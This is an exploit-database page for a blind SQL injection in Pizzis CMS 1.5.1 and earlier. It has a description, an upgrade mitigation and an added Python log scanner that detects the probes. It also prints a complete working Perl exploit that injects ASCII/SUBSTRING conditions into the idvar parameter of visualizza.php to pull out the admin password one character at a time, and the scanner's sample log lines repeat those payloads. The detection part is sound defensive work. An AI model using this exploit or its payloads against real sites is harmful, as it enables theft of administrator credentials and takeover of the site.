Vendor: Pizzis CMS
By: darkjoker
CVSS: 7.5 (HIGH)
Vulnerability: Blind SQL Injection
CWE: 89
Product Name: Pizzis CMS
Affected Version From: 1.5.2001
Affected Version To: 1.5.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:pizzis_cms:pizzis_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit

Pizzis CMS version 1.5.1 and prior are vulnerable to Blind SQL Injection. The exploit extracts the admin password from the database through the `idvar` parameter of `visualizza.php`: each GET request carries a boolean condition that tests whether one character of the password has a given ASCII value, and the presence of an `<h4>` element in the response tells the script whether the condition was true. It walks through the candidate characters for each position of the password, printing each character as it is confirmed.

Mitigation:

Upgrade to the latest version of Pizzis CMS
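Beyond upgrading, a defender can recognise this attack in web server logs: the probes hit one script with a non-integer `idvar` value containing a boolean operator and a character-extraction function, and they arrive in bursts from one source because every password character needs several requests. The following Python is an added example written for this page, not code from the Exploit-DB entry or from Pizzis CMS; the log lines are constructed to mimic the probes of the exploit above (plus benign traffic), and the parameter name list and the per-source threshold of 3 are assumptions a deployment would tune.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format (not real traffic).
# The first three mimic the boolean probes the exploit sends to visualizza.php;
# the last two are benign requests.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Jan/2009:10:00:01 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),1,1))=97 HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [08/Jan/2009:10:00:01 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),1,1))=98 HTTP/1.1" 200 512 "-" "-"
203.0.113.7 - - [08/Jan/2009:10:00:02 +0000] "GET /pizziscms/visualizza.php?idvar=98765%20OR%20ASCII(SUBSTRING((SELECT%20pass%20FROM%20pizziscms_admin%20WHERE%20user%20%20=%20%27admin%27),2,1))=97 HTTP/1.1" 200 512 "-" "-"
198.51.100.4 - - [08/Jan/2009:10:00:05 +0000] "GET /pizziscms/visualizza.php?idvar=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [08/Jan/2009:10:00:06 +0000] "GET /pizziscms/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source IP, timestamp, method and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# Signature of a boolean-based blind probe: a boolean operator followed by a
# character-extraction function, the shape of the payload in the exploit above.
BLIND_SQLI_RE = re.compile(
    r"\b(?:OR|AND)\b.*\b(?:ASCII|SUBSTRING|SUBSTR|MID)\s*\(", re.IGNORECASE
)

# Parameters that the application only ever expects as integers (assumption).
NUMERIC_PARAMS = ("idvar",)


def parse_line(line):
    """Split one log line into ip, timestamp, path and decoded query params."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "path": parts.path,
        # parse_qs percent-decodes values, so %20/%27 become space and quote.
        "params": parse_qs(parts.query, keep_blank_values=True),
    }


def classify(rec):
    """Return the reasons a parsed request looks like an injection attempt."""
    reasons = []
    for name in NUMERIC_PARAMS:
        for value in rec["params"].get(name, []):
            if not value.strip().isdigit():
                reasons.append(f"{name} is not an integer: {value[:40]!r}")
            if BLIND_SQLI_RE.search(value):
                reasons.append(f"{name} carries a boolean/char-extraction probe")
    return reasons


def scan(log_text, threshold=3):
    """Flag suspicious requests, and sources that sent at least `threshold`
    of them: the request-per-character pattern of blind extraction."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ip"], rec["path"], reasons))
            per_ip[rec["ip"]] += 1
    noisy = {ip: n for ip, n in per_ip.items() if n >= threshold}
    return hits, noisy


if __name__ == "__main__":
    found, sources = scan(SAMPLE_LOG)
    for ip, path, why in found:
        print(f"{ip} {path}: {'; '.join(why)}")
    print("sources exceeding threshold:", sources)
```

The integer check alone catches this particular payload, since `visualizza.php` is only ever meant to receive a numeric `idvar`; the regex adds coverage for the same probe shape against other parameters, and the per-source count turns a string of single alerts into one finding about an extraction in progress.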
Source

Exploit-DB raw data:

--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--


#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

sub usage {
   die
       "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
       "\n[+] Author: darkjoker".
       "\n[+] Site  : http://darkjoker.net23.net".
       "\n[+] Usage : perl $0 <hostname> <path> <username>".
       "\n[+] Ex.   : perl $0 localhost /pizziscms admin".
       "\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
       "\n\n";
}

# Build the boolean condition injected into the idvar parameter: it is true
# only when the character at position $pos of the password has ASCII code $chr.
sub query {
   my ($user, $chr, $pos) = @_;
   my $query = "98765 OR ASCII(SUBSTRING((SELECT pass FROM pizziscms_admin WHERE user  = '${user}'),${pos},1))=${chr}";
   # Only spaces and single quotes are URL-encoded; the rest is sent as-is.
   $query =~ s/ /%20/g;
   $query =~ s/'/%27/g;
   return $query;
}

# Send one probe and use the presence of a non-empty <h4> element in the
# response as the boolean oracle: returns 1 if the condition held, else 0.
sub exploit {
   my ($hostname, $path, $user, $chr, $pos) = @_;
   $chr = ord ($chr);

   my $sock = IO::Socket::INET->new (
       PeerHost => $hostname,
       PeerPort => 80,
       Proto    => "tcp",
   ) or die $!;

   my $query = query ($user, $chr, $pos);
   my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n".
             "Host: ${hostname}\r\n".
             "Connection: Close\r\n\r\n";

   print $sock $request;

   my $reply = '';
   while (<$sock>)
   {
       $reply .= $_;
   }
   close ($sock);

   # Collapse whitespace so the element can be matched across line breaks.
   $reply =~ s/\s/ /g;

   if ($reply =~ /<h4>(.+)<\/h4>/ && length ($1) > 1)
   {
       return 1;
   }
   else
   {
       return 0;
   }
}

if (scalar (@ARGV) != 3)
{
   usage ();
}

my ($hostname, $path, $user) = @ARGV;

# Candidate character set: the password is assumed to be lowercase alphanumeric.
my @key = split ('', 'abcdefghijklmnopqrstuvwxyz0123456789');
my $pos = 1;
my $chr = 0;

print "[+] Password: ";
while ($pos <= 32)
{
   # No candidate matched this position: end of password or a character
   # outside @key, so stop instead of indexing past the end of the set.
   last if $chr > $#key;
   if (exploit ($hostname, $path, $user, $key [$chr], $pos))
   {
       print $key [$chr];
       $chr = -1;   # restart the candidate set for the next position
       $pos++;
   }
   $chr++;
}

print "\n";

# milw0rm.com [2009-01-08]